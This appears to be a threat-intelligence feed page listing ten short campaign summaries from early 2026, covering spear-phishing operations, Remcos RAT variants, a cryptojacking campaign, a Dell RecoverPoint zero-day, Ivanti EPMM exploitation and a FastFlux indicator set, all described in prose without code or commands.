LATEST THREAT INTELLIGENCE.
Operation Nomad Leopard: Targeted Spear-Phishing Campaign Against Government Entities in Afghanistan
Description: A threat group is targeting Afghan government employees using a fake lure mimicking an official government document. The campaign, named Operation Nomad Leopard, uses a malicious ISO file containing a PDF decoy, LNK file, and the FALSECUB malware. The infection chain involves executing the LNK file to display the PDF and run the malware, which establishes persistence and connects to a command and control server. The malware performs system reconnaissance, file enumeration, and data exfiltration. The threat actor, believed to be regionally focused with low-to-moderate sophistication, uses GitHub for malware distribution and has connections to Pakistan. The campaign demonstrates careful attention to detail in creating convincing lures and leverages legitimate platforms for malicious purposes.
Created at: 2026-01-20T08:51:25.640000
Updated at: 2026-02-19T08:03:30.845000
Operation Covert Access: Weaponized LNK-Based Spear-Phishing Targeting Argentina's Judicial Sector to Deploy a Covert RAT
Description: A sophisticated spear-phishing campaign targeting Argentina's judicial sector has been uncovered. The operation uses a multi-stage infection chain to deploy a stealthy Remote Access Trojan (RAT). Attackers exploit trust in court communications by using authentic-looking judicial decoy documents. The campaign employs a weaponized LNK file, a BAT-based loader script, and a covert Rust-based RAT to establish persistent access within judicial environments. The malware performs extensive anti-VM and anti-debug checks, collects system information, and establishes resilient C2 connections. It supports various malicious activities including persistence, file transfer, data harvesting, encryption, and privilege escalation. The campaign demonstrates high operational sophistication and aims to gain long-term access to sensitive legal and institutional data.
Created at: 2026-01-20T08:48:18.007000
Updated at: 2026-02-19T08:03:30.845000
Cryptojacking Campaign Exploits Driver to Boost Monero Mining
Description: A sophisticated cryptojacking campaign has been discovered, spreading through pirated software installers. The operation utilizes a customized XMRig miner and a controller component for long-term system access. Unlike browser-based schemes, this campaign deploys system-level malware using deceptive installers masquerading as office software. The modular design enhances resilience, with multiple watchdog processes for persistence. A notable feature is the exploitation of a vulnerable signed driver (CVE-2020-14979) to gain kernel-level access, boosting Monero mining performance by 15% to 50%. The campaign connects to the Kryptex mining pool and uses a Monero wallet for payouts. Organizations are advised to enable Microsoft's vulnerable driver blocklist and implement other protective measures.
Created at: 2026-02-18T16:50:28.365000
Updated at: 2026-02-18T19:15:00.484000
Remcos Revisited: Inside the RAT's Evolving Command-and-Control Techniques
Description: This analysis examines the evolution of Remcos, a Remote Access Trojan that has become a significant global threat. Originally a commercial tool, Remcos now provides attackers with capabilities such as credential theft, keylogging, screen capture, and webcam control. The latest variant exhibits real-time command-and-control communication, enabling immediate surveillance. The malware uses sophisticated techniques like dynamic API resolution, encrypted configurations, and modular plugins to evade detection. It establishes persistence through registry modifications and employs cleanup routines to remove traces of its activity. The report details Remcos' infection vectors, data exfiltration methods, and its network interactions with command-and-control servers.
Created at: 2026-02-18T16:50:28.910000
Updated at: 2026-02-18T19:14:07.212000
Law Firm Sites Hijacked in Suspected Supply-Chain Attack
Description: GrayCharlie, a threat actor active since mid-2023, compromises WordPress sites to inject links redirecting visitors to NetSupport RAT payloads via fake browser updates or ClickFix mechanisms. These infections often lead to Stealc and SectopRAT deployments. The group's infrastructure is primarily linked to MivoCloud and HZ Hosting Ltd. A cluster of US law firm sites was compromised around November 2025, possibly through a supply-chain attack. GrayCharlie uses two main attack chains: one involving fake browser updates and another using ClickFix-style lures. The group's objectives appear to focus on data theft and financial gain, with potential access selling to other threat actors.
Created at: 2026-02-18T16:28:06.616000
Updated at: 2026-02-18T19:13:08.210000
Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day
Description: UNC6201, a suspected PRC-nexus threat group, has been exploiting a zero-day vulnerability (CVE-2026-22769) in Dell RecoverPoint for Virtual Machines since mid-2024. The group uses this flaw for lateral movement, persistent access, and deployment of malware including SLAYSTYLE, BRICKSTORM, and a new backdoor called GRIMBOLT. GRIMBOLT, written in C# and compiled using native AOT, represents a shift in tradecraft designed to complicate analysis and improve performance. The actors also employed novel tactics to pivot into VMware infrastructure, including 'Ghost NICs' creation and iptables for Single Packet Authorization. Dell has released patches for the vulnerability, and the post provides detailed technical analysis, detection opportunities, and hardening guidance.
Created at: 2026-02-18T12:11:55.960000
Updated at: 2026-02-18T16:23:29.895000
Spam Campaign Abuses Atlassian Jira, Targets Government and Corporate Entities
Description: A sophisticated spam campaign exploited Atlassian Jira Cloud to bypass security controls and target government and corporate entities. The attackers used legitimate Atlassian Cloud infrastructure to create disposable Jira instances, leveraging the platform's trusted domain reputation. The campaign targeted specific language groups, including English, French, German, Italian, Portuguese, and Russian speakers, with tailored emails redirecting to investment scams and online casinos. The operation demonstrated high automation and abuse of SaaS workflows, highlighting the need for reassessing trust assumptions in cloud-generated emails. The campaign utilized Keitaro Traffic Distribution System for redirects and focused on organizations already using Atlassian Jira, exploiting their familiarity with Jira-related emails.
Created at: 2026-02-18T12:11:55.575000
Updated at: 2026-02-18T16:22:58.317000
Infrastructure of Interest: Medium Confidence FastFlux
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous DNS patterns, behavioral analysis of rapid IP rotation, and cross-referenced intelligence from global sinkhole data and network telemetry. The IOCs included in this pulse are associated with Fastflux networks, characterized by constantly changing IP addresses and DNS records to evade detection while maintaining resilient malicious infrastructure for phishing, malware delivery, or C2 operations. Use this data to enhance DNS-based detection rules, identify flux parent domains, and disrupt threat actor network resilience. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:34:03.778000
Updated at: 2026-02-18T14:11:21.096000
Critical Vulnerabilities in Ivanti EPMM Exploited
Description: Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile are being actively exploited, allowing unauthenticated remote code execution on servers. Widespread exploitation has been observed, including reverse shells, web shells, reconnaissance, and malware downloads. Affected sectors include government, healthcare, manufacturing, and technology in multiple countries. Over 4,400 vulnerable instances have been identified. Attackers are moving quickly from initial access to deploying persistent backdoors. Immediate patching is strongly recommended, as exploitation attempts are largely automated and opportunistic.
Created at: 2026-02-18T02:31:55.347000
Updated at: 2026-02-18T12:12:45.216000
New Remcos Campaign Distributed Through Fake Shipping Document
Description: A new phishing campaign has been discovered that delivers a fileless variant of the Remcos RAT. The attack begins with an email impersonating a Vietnamese shipping company, luring victims to open a malicious Word document. This document retrieves a remote RTF file, exploits a vulnerability, and executes VBScript and PowerShell code, resulting in the in-memory loading of a .NET module. The module acts as both a loader and persistence mechanism for the Remcos payload. The Remcos variant (version 7.0.4 Pro) is downloaded into memory and injected into a legitimate system process via process hollowing. It offers extensive remote control capabilities across six categories, including system management, surveillance, networking, communication, and agent control. The analysis details the infection chain, payload structure, and Remcos features, providing insights into this sophisticated attack methodology.
Created at: 2026-01-19T09:40:15.573000
Updated at: 2026-02-18T09:04:06.977000
